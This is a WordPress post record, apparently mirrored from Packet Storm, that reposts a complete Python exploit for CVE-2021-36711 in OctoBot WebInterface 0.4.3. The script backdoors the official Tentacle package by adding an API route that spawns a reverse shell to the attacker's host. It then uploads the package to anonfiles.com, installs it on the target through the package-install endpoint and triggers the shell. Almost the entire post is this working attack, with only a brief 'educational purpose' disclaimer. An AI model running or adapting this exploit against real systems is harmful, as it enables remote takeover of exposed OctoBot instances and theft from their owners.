{"id":27352,"date":"2022-07-22T01:28:11","date_gmt":"2022-07-21T21:28:11","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167780\/octobotwi043-exec.txt"},"modified":"2022-07-22T11:36:13","modified_gmt":"2022-07-22T07:06:13","slug":"octobot-webinterface-0-4-3-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/octobot-webinterface-0-4-3-remote-code-execution\/","title":{"rendered":"OctoBot WebInterface 0.4.3 Remote Code Execution"},"content":{"rendered":"

# Exploit Title: OctoBot WebInterface 0.4.3 – Remote Code Execution (RCE)
\n# Date: 9\/2\/2021
\n# Exploit Author: Samy Younsi, Thomas Knudsen
\n# Vendor Homepage: https:\/\/www.octobot.online\/
\n# Software Link: https:\/\/github.com\/Drakkar-Software\/OctoBot
\n# Version: 0.4.0beta3 – 0.4.3
\n# Tested on: Linux (Ubuntu, CentOs)
\n# CVE : CVE-2021-36711<\/p>\n

from __future__ import print_function, unicode_literals
\nfrom bs4 import BeautifulSoup
\nimport argparse
\nimport requests
\nimport zipfile
\nimport time
\nimport sys
\nimport os<\/p>\n

def banner():
\nsashimiLogo = “””
\n_________ . .
\n(.. \\_ , |\\ \/|
\n\\ O \\ \/| \\ \\\/ \/
\n\\______ \\\/ | \\ \/
\nvvvv\\ \\ | \/ |
\n_ _ _ _ \\^^^^ == \\_\/ |
\n| | __ _ | || |__ (_)_ __ ___ (_)`\\_ === \\. |
\n\/ __)\/ _` \/ __| ‘_ \\| | ‘_ ` _ \\| |\/ \/\\_ \\ \/ |
\n\\__ | (_| \\__ | | | | | | | | | | ||\/ \\_ \\| \/
\n( \/\\__,_( |_| |_|_|_| |_| |_|_| \\________\/
\n|_| |_| \\033[1;91mOctoBot Killer\\033[1;m
\nAuthor: \\033[1;92mNaqwada\\033[1;m
\nRuptureFarm 1029<\/p>\n

FOR EDUCATIONAL PURPOSE ONLY.
\n“””
\nreturn print(‘\\033[1;94m{}\\033[1;m’.format(sashimiLogo))<\/p>\n

def help():
\nprint(‘[!] \\033[1;93mUsage: \\033[1;m’)
\nprint(‘[-] python3 {} –RHOST \\033[1;92mTARGET_IP\\033[1;m –RPORT \\033[1;92mTARGET_PORT\\033[1;m –LHOST \\033[1;92mYOUR_IP\\033[1;m –LPORT \\033[1;92mYOUR_PORT\\033[1;m’.format(sys.argv[0]))
\nprint(‘[-] \\033[1;93mNote*\\033[1;m If you are using a hostname instead of an IP address please remove http:\/\/ or https:\/\/ and try again.’)<\/p>\n

def getOctobotVersion(RHOST, RPORT):
\nif RPORT == 443:
\nurl = ‘https:\/\/{}:{}\/api\/version’.format(RHOST, RPORT)
\nelse:
\nurl = ‘http:\/\/{}:{}\/api\/version’.format(RHOST, RPORT)
\nreturn curl(url)<\/p>\n

def restartOctobot(RHOST, RPORT):
\nif RPORT == 443:
\nurl = ‘https:\/\/{}:{}\/commands\/restart’.format(RHOST, RPORT)
\nelse:
\nurl = ‘http:\/\/{}:{}\/commands\/restart’.format(RHOST, RPORT)<\/p>\n

try:
\nrequests.get(url, allow_redirects=False, verify=False, timeout=1)
\nexcept requests.exceptions.ConnectionError as e:
\nprint(‘[+] \\033[1;92mOctoBot is restarting … Please wait 30 seconds.\\033[1;m’)
\ntime.sleep(30)<\/p>\n

def downloadTentaclePackage(octobotVersion):
\nprint(‘[+] \\033[1;92mStart downloading Tentacle package for OctoBot {}.\\033[1;m’.format(octobotVersion))
\nurl = ‘https:\/\/static.octobot.online\/tentacles\/officials\/packages\/full\/base\/{}\/any_platform.zip’.format(octobotVersion)
\nresult = requests.get(url, stream=True)
\nwith open(‘{}.zip’.format(octobotVersion), ‘wb’) as fd:
\nfor chunk in result.iter_content(chunk_size=128):
\nfd.write(chunk)
\nprint(‘[+] \\033[1;92mDownload completed!\\033[1;m’)<\/p>\n

def unzipTentaclePackage(octobotVersion):
\nzip = zipfile.ZipFile(‘{}.zip’.format(octobotVersion))
\nzip.extractall(‘quests’)
\nos.remove(‘{}.zip’.format(octobotVersion))
\nprint(‘[+] \\033[1;92mTentacle package has been extracted.\\033[1;m’)<\/p>\n

def craftBackdoor(octobotVersion):
\nprint(‘[+] \\033[1;92mCrafting backdoor for Octobot Tentacle Package {}…\\033[1;m’.format(octobotVersion))
\npath = ‘quests\/reference_tentacles\/Services\/Interfaces\/web_interface\/api\/’
\ninjectInitFile(path)
\ninjectMetadataFile(path)
\nprint(‘[+] \\033[1;92mSashimi malicious Tentacle Package for OctoBot {} created!\\033[1;m’.format(octobotVersion))<\/p>\n

def injectMetadataFile(path):
\nwith open(‘{}metadata.py’.format(path),’r’) as metadataFile:
\ncontent = metadataFile.read()
\naddPayload = content.replace(‘import json’, ”.join(‘import json\\nimport flask\\nimport sys, socket, os, pty’))
\naddPayload = addPayload.replace(‘@api.api.route(“\/announcements”)’, ”.join(‘@api.api.route(“\/sashimi”)\\ndef sashimi():\\n\\ts = socket.socket()\\n\\ts.connect((flask.request.args.get(“LHOST”), int(flask.request.args.get(“LPORT”))))\\n\\t[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]\\n\\tpty.spawn(“\/bin\/sh”)\\n\\n\\n@api.api.route(“\/announcements”)’))
\nwith open(‘{}metadata.py’.format(path),’w’) as newMetadataFile:
\nnewMetadataFile.write(addPayload)<\/p>\n

def injectInitFile(path):
\nwith open(‘{}__init__.py’.format(path),’r’) as initFile:
\ncontent = initFile.read()
\naddPayload = content.replace(‘announcements,’, ”.join(‘announcements,\\n\\tsashimi,’))
\naddPayload = addPayload.replace(‘”announcements”,’, ”.join(‘”announcements”,\\n\\t”sashimi”,’))
\nwith open(‘{}__init__.py’.format(path),’w’) as newInitFile:
\nnewInitFile.write(addPayload)<\/p>\n

def rePackTentaclePackage():
\nprint(‘[+] \\033[1;92mRepacking Tentacle package.\\033[1;m’)
\nwith zipfile.ZipFile(‘any_platform.zip’, mode=’w’) as zipf:
\nlen_dir_path = len(‘quests’)
\nfor root, _, files in os.walk(‘quests’):
\nfor file in files:
\nfile_path = os.path.join(root, file)
\nzipf.write(file_path, file_path[len_dir_path:])<\/p>\n

def uploadMaliciousTentacle():
\nprint(‘[+] \\033[1;92mUploading Sashimi malicious Tentacle .ZIP package on anonfiles.com” link=”https:\/\/app.recordedfuture.com\/live\/sc\/entity\/idn:anonfiles.com” style=””>anonfiles.com… May take a minute.\\033[1;m’)<\/p>\n

file = {
\n‘file’: open(‘any_platform.zip’, ‘rb’),
\n}
\nresponse = requests.post(‘https:\/\/api.anonfiles.com\/upload’, files=file, timeout=60)
\nzipLink = response.json()[‘data’][‘file’][‘url’][‘full’]\nresponse = requests.get(zipLink, timeout=60)
\nsoup = BeautifulSoup(response.content.decode(‘utf-8’), ‘html.parser’)
\nzipLink = soup.find(id=’download-url’).get(‘href’)
\nprint(‘[+] \\033[1;92mSashimi malicious Tentacle has been successfully uploaded. {}\\033[1;m’.format(zipLink))
\nreturn zipLink<\/p>\n

def curl(url):
\nresponse = requests.get(url, allow_redirects=False, verify=False, timeout=60)
\nreturn response<\/p>\n

def injectBackdoor(RHOST, RPORT, zipLink):
\nprint(‘[+] \\033[1;92mInjecting Sashimi malicious Tentacle packages in Ocotobot… May take a minute.\\033[1;m’)
\nif RPORT == 443:
\nurl = ‘https:\/\/{}:{}\/advanced\/tentacle_packages?update_type=add_package’.format(RHOST, RPORT)
\nelse:
\nurl = ‘http:\/\/{}:{}\/advanced\/tentacle_packages?update_type=add_package’.format(RHOST, RPORT)<\/p>\n

headers = {
\n‘Content-Type’: ‘application\/json’,
\n‘X-Requested-With’: ‘XMLHttpRequest’,
\n}<\/p>\n

data = ‘{“‘+zipLink+'”:”register_and_install”}’<\/p>\n

response = requests.post(url, headers=headers, data=data)
\nresponse = response.content.decode(‘utf-8’).replace(‘”‘, ”).strip()<\/p>\n

os.remove(‘any_platform.zip’)<\/p>\n

if response != ‘Tentacles installed’:
\nprint(‘[!] \\033[1;91mError: Something went wrong while trying to install the malicious Tentacle package.\\033[1;m’)
\nexit()
\nprint(‘[+] \\033[1;92mSashimi malicious Tentacle package has been successfully installed on the OctoBot target.\\033[1;m’)<\/p>\n

def execReverseShell(RHOST, RPORT, LHOST, LPORT):
\nprint(‘[+] \\033[1;92mExecuting reverse shell on {}:{}.\\033[1;m’.format(LHOST, LPORT))
\nif RPORT == 443:
\nurl = ‘https:\/\/{}:{}\/api\/sashimi?LHOST={}&LPORT={}’.format(RHOST, RPORT, LHOST, LPORT)
\nelse:
\nurl = ‘http:\/\/{}:{}\/api\/sashimi?LHOST={}&LPORT={}’.format(RHOST, RPORT, LHOST, LPORT)
\nreturn curl(url)<\/p>\n

def isPassword(RHOST, RPORT):
\nif RPORT == 443:
\nurl = ‘https:\/\/{}:{}’.format(RHOST, RPORT)
\nelse:
\nurl = ‘http:\/\/{}:{}’.format(RHOST, RPORT)
\nreturn curl(url)<\/p>\n

def main():
\nbanner()
\nargs = parser.parse_args()<\/p>\n

if isPassword(args.RHOST, args.RPORT).status_code != 200:
\nprint(‘[!] \\033[1;91mError: This Octobot Platform seems to be protected with a password!\\033[1;m’)<\/p>\n

octobotVersion = getOctobotVersion(args.RHOST, args.RPORT).content.decode(‘utf-8’).replace(‘”‘,”).replace(‘OctoBot ‘,”)<\/p>\n

if len(octobotVersion) > 0:
\nprint(‘[+] \\033[1;92mPlatform OctoBot {} detected.\\033[1;m’.format(octobotVersion))<\/p>\n

downloadTentaclePackage(octobotVersion)
\nunzipTentaclePackage(octobotVersion)
\ncraftBackdoor(octobotVersion)
\nrePackTentaclePackage()
\nzipLink = uploadMaliciousTentacle()
\ninjectBackdoor(args.RHOST, args.RPORT, zipLink)
\nrestartOctobot(args.RHOST, args.RPORT)
\nexecReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)<\/p>\n

if __name__ == “__main__”:
\nparser = argparse.ArgumentParser(description=’POC script that exploits the Tentacles upload functionalities on OctoBot. A vulnerability has been found and can execute a reverse shell by crafting a malicious packet. Version affected from 0.4.0b3 to 0.4.0b10 so far.’, add_help=False)
\nparser.add_argument(‘-h’, ‘–help’, help=help())
\nparser.add_argument(‘–RHOST’, help=”Refers to the IP of the target machine.”, type=str, required=True)
\nparser.add_argument(‘–RPORT’, help=”Refers to the open port of the target machine.”, type=int, required=True)
\nparser.add_argument(‘–LHOST’, help=”Refers to the IP of your machine.”, type=str, required=True)
\nparser.add_argument(‘–LPORT’, help=”Refers to the open port of your machine.”, type=int, required=True)
\nmain()<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: OctoBot WebInterface 0.4.3 – Remote Code Execution (RCE) # Date: 9\/2\/2021 # Exploit Author: Samy Younsi, Thomas Knudsen # Vendor Homepage: https:\/\/www.octobot.online\/ # Software Link: https:\/\/github.com\/Drakkar-Software\/OctoBot # Version: 0.4.0beta3 – 0.4.3 # Tested on: Linux (Ubuntu, CentOs) # CVE : CVE-2021-36711 from __future__ import print_function, unicode_literals from bs4 import BeautifulSoup import argparse …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-27352","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/27352","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=27352"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/27352\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=27352"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=27352"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=27352"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}